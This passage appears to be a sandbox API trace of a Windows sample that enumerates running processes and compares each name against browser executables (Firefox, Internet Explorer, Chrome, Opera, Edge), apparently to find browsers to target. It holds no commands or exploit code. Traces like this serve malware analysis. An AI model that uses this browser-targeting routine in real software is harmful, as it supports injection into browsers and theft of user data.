lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0204.507] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0204.507] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0204.507] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0204.507] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.507] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0204.507] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0204.507] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0204.507] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0204.507] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0204.507] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.507] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0204.508] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0204.508] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0204.508] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0204.508] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0204.508] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.508] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0204.509] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0204.509] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0204.509] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0204.509] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0204.509] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.509] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.509] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.509] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.509] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.509] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.509] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.509] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.510] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.510] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.511] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.511] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.511] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.511] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.511] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.511] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.512] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.512] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.512] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.512] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.512] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.512] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0204.512] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0204.512] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0204.512] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0204.512] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0204.512] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.512] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.513] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.513] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.513] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.513] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.513] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.513] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.513] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.513] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.514] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.514] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.514] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0204.514] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0204.514] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0204.514] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0204.514] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0204.514] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0204.515] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0204.515] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0204.515] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0204.515] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0204.515] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.515] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.515] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0204.515] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0204.515] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0204.515] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0204.515] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.515] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.516] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.516] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.516] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.516] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.516] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.516] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0204.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0204.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0204.517] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0204.517] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0204.517] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0204.517] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0204.517] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0204.517] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0204.517] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0204.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0204.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0204.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0204.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0204.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.518] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0204.518] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0204.518] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0204.518] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0204.518] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0204.518] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.518] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0204.519] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0204.519] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0204.519] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0204.519] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0204.519] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.519] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0204.519] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0204.519] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0204.519] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0204.520] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0204.520] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.520] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0204.520] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0204.520] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0204.520] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0204.520] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0204.520] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.520] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0204.521] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0204.521] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0204.521] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0204.521] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0204.521] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.521] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0204.521] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0204.521] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0204.521] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0204.521] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0204.521] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.521] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0204.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0204.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0204.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0204.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0204.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.522] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0204.522] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0204.522] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0204.522] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0204.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0204.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.523] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0204.523] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0204.523] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0204.523] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0204.523] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0204.523] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.523] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0204.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0204.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0204.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0204.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0204.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.524] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0204.524] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0204.524] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0204.524] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0204.524] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0204.525] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.525] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0204.525] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0204.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0204.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0204.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0204.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.526] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0204.526] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0204.526] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0204.526] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0204.526] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0204.526] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.526] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0204.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0204.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0204.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0204.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0204.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.527] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0204.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0204.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0204.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0204.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0204.527] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.527] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0204.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0204.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0204.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0204.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0204.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.528] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0204.528] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0204.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0204.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0204.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0204.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.529] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0204.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0204.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0204.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0204.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0204.529] lstrcmpiA (lpString1="doctrine alcohol.exe", 